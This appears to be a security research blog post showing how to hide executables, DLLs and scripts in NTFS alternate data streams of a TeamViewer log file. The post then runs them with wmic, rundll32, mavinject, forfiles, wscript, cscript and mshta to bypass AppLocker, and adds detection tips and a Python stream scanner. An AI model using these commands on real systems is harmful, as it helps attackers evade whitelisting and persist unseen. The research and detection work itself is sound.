URL: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

Oddvar Moe's Blog

Notes from My adventures with Windows security


PUTTING DATA IN ALTERNATE DATA STREAMS AND HOW TO EXECUTE IT

Posted on 14 Jan 2018 (updated 29 Aug 2018) by Oddvar Moe [MVP]

Part 2 of this research can be found
here: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

I have always been fascinated by ADS (Alternate Data Streams) and their use as
part of persistence. My first encounter with this as a persistence technique was
when Matt Nelson aka @Enigma0x3 wrote a blog post about using
it: https://enigma0x3.net/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/

Quite recently I have started to play with AppLocker bypasses in order to create
a tool, and somehow I saw a shiny thing that I just had to look at. I did a
normal check on my AppLocker test system using Accesschk.exe and discovered a
writable file within the TeamViewer folder, a log file to be exact. This led me
to the discovery that you can inject data into an alternate stream of that file,
execute it, and it works as an AppLocker bypass.
I posted a tweet about this
here: https://twitter.com/Oddvarmoe/status/951757732557852673

(Kudos to TeamViewer for looking into the issue from their side)

Here is a screenshot of the bypass I found:

[Screenshot not included in this capture]
So what I did was that I first injected the payload into the ADS of the log file
using this command:

type c:\temp\bginfo.exe > "C:\program files (x86)\Teamviewer\TeamViewer12_Logfile.log:bginfo.exe"

Then I used the following command to execute it:

wmic process call create '"C:\program files (x86)\Teamviewer\TeamViewer12_Logfile.log:bginfo.exe"'


After I was done looking at this bypass I got even more curious. What sort of
other processes are able to execute from ADS?

I did some Googling around ADS and found out that back in the day you could
use:

start c:\folder\file.exe:ADSStream.exe

to launch executables from ADS. This is now blocked.

After some testing, searching and playing around I found that at least the
following are able to execute from ADS (and I am sure that there are hundreds
more as well):

rundll32.exe

type "C:\temp\messagebox64.dll" > "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll"

rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain

Mavinject.exe

Start a 32-bit notepad, look up its process ID with tasklist, then inject the DLL stored in the stream into that process:

c:\windows\SysWOW64\notepad.exe

tasklist | findstr notepad

type C:\temp\AtomicTest.dll > "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"

C:\windows\WinSxS\wow64_microsoft-Windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"

Forfiles.exe

In my testing forfiles does not handle spaces in paths well, so it seems you
have to use the 8.3 folder name for some reason.

forfiles /P C:\windows\system32 /m notepad.exe /c "c:\Progra~2\Teamviewer\TeamViewer13_Logfile.log:bginfo2.exe"

Wscript.exe

type "C:\Program Files\test\wscripthello.vbs" > "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:wscripts.vbs"

wscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:wscripts.vbs"

Cscript.exe

cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:wscripts.vbs"

MSHTA.exe

type C:\temp\helloworld.hta > "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"

mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"


I am pretty sure this is not everything that can execute from ADS. These are
just some examples I found pretty fast while playing with it. My point with this
post is to raise awareness of Alternate Data Streams. If you are not checking
for malicious activity within the ADS of your files/folders, I suggest you
start. That's it.


Update 18.01.2018:
I added these methods to a GIST found
here: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
I will try to keep it updated when I discover new methods.

I was also asked a lot about how to detect these alternate data streams. There
are several utilities to view ADS.

Dir /r c:\fileorfolder

https://docs.microsoft.com/en-us/sysinternals/downloads/streams
https://www.nirsoft.net/utils/alternate_data_streams.html

Sysmon also offers some monitoring of ADS AFAIK.
https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
https://twitter.com/SwiftOnSecurity/status/952659933836791808

There are also some PowerShell scripts that can be used.
https://github.com/forgottentq/powershell/blob/master/find-steams.ps1
https://github.com/p0shkatz/Get-ADS
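As an added example (not part of the original post, and not one of the tools linked above), here is a small Python script that parses the output of the Dir /r check and flags alternate streams other than the benign Zone.Identifier mark-of-the-web, noting which stream names carry an executable or script extension like the ones executed above. The listing embedded in it is constructed sample output, not output captured in the post.

```python
import re

# Constructed sample of `dir /r` output (not captured in the post).
# Alternate streams appear as extra lines with a size and "<file>:<stream>:$DATA".
SAMPLE_DIR_R = """\
 Directory of C:\\Program Files (x86)\\TeamViewer

14.01.2018  20:12    <DIR>          .
14.01.2018  20:12    <DIR>          ..
14.01.2018  20:10            12,345 TeamViewer13_Logfile.log
                              5,120 TeamViewer13_Logfile.log:ADSDLL.dll:$DATA
                                412 TeamViewer13_Logfile.log:wscripts.vbs:$DATA
14.01.2018  19:55            33,000 setup.exe
                                 26 setup.exe:Zone.Identifier:$DATA
               2 File(s)         45,345 bytes
"""

# Stream lines have no date/time column: leading whitespace, size, then name:stream:$DATA.
STREAM_RE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")

# Extensions the post shows being launched straight from a stream, plus a few common ones.
RISKY_EXT = (".exe", ".dll", ".vbs", ".hta", ".js", ".ps1", ".bat", ".cmd")


def parse_streams(dir_output):
    """Return one dict per alternate data stream found in `dir /r` output."""
    streams = []
    for line in dir_output.splitlines():
        m = STREAM_RE.match(line)
        if m:
            size, host, stream = m.groups()
            streams.append({"host": host, "stream": stream,
                            "size": int(size.replace(",", ""))})
    return streams


def suspicious_streams(dir_output):
    """Drop the benign Zone.Identifier (mark-of-the-web) streams and tag the rest."""
    hits = []
    for rec in parse_streams(dir_output):
        if rec["stream"] == "Zone.Identifier":
            continue
        rec["risky_ext"] = rec["stream"].lower().endswith(RISKY_EXT)
        hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in suspicious_streams(SAMPLE_DIR_R):
        flag = "EXECUTABLE" if rec["risky_ext"] else "data"
        print(f"{flag:10} {rec['host']}:{rec['stream']} ({rec['size']} bytes)")
```

Pipe real Dir /r output into the script (or paste it in place of SAMPLE_DIR_R) to get a quick list of streams worth a closer look; any stream on a file that should only hold data, such as a log file, is the case the post describes.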

Cheers!


Update 29.08.2018:
Another great resource on ADS written by Marc Ochsenmeier can be found
here: https://winitor.com/pdf/NtfsAlternateDataStreams.pdf

Tagged ADS, AppLocker, bypass, hacking, research
14 THOUGHTS ON “PUTTING DATA IN ALTERNATE DATA STREAMS AND HOW TO EXECUTE IT”

 1.  Fred Speece says:
     15 Jan 2018 at 9:17 pm
     
     Anything we can do about this bypass? Any mitigations?
     
     1. Oddvar Moe [MVP] says:
        15 Jan 2018 at 9:48 pm
        
        There is no such thing that disables ADS. What I would recommend is to
        try to monitor your systems for insertion or presence of ADS data in
        your files.
        Sysmon (free util from MS) has the option to log this.
        
 2.  Pingback: Loading Alternate Data Stream (ADS) DLL/CPL Binaries to Bypass
     AppLocker | | bohops |
     
 3.  Pingback: Putting data in Alternate data streams and how to execute it –
     part 2 – Oddvar Moe's Blog
     
 4.  Pingback: Putting data in Alternate data streams and how to execute it –
     Information Security Outsider
     
 5.  altstrix says:
     13 Jul 2018 at 3:52 pm
     
     The first example you have is hiding an executable file in an ADS, and then
     executing it through WMIC, but whenever I tried this on my own machine, I
     noticed that nothing actually happened. I'd get the same message you got,
     where it said it got a return value of 9, but nothing would actually start.
     I don't know if there's something I missed, so please let me know. I want
     to be able to replicate this, but until I can, I'm not gonna panic.
     
     1. Oddvar Moe [MVP] says:
        23 Jul 2018 at 10:21 am
        
        AFAIK there has been some changes to Windows and WMIC. I think they may
        have stopped this way of executing. I will check to verify.
        
 6.  test says:
     20 Feb 2019 at 10:26 am
     
     Are you sure that your HTA from ADS is your hello world HTA? I mean, mshta
     can open an empty template if the path to the HTA file is incorrect. I tried
     to open an HTA with text through ADS and it opens only an empty page. So
     maybe mshta doesn't really open from ADS? What do you think about it?
     
     1. Oddvar Moe [MVP] says:
        20 Feb 2019 at 10:31 am
        
        Could be that it has changed… I will check. Thanks for the info
        
 7.  Pingback: A small discovery about AppLocker – Oddvar Moe's Blog
     
 8.  Pingback: Attack Detection Fundamentals: Code Execution and Persistence –
     Lab #1 – TerabitWeb Blog
     
 9.  Pingback: Attack Detection Fundamentals: Code Execution and Persistence -
     Lab #1
     
 10. Pingback: RED TEAMING_Final Att&ck – B4cKD00₹
     
 11. Pingback: Alternate Data Stream (ADS) Experiments – Catch22
     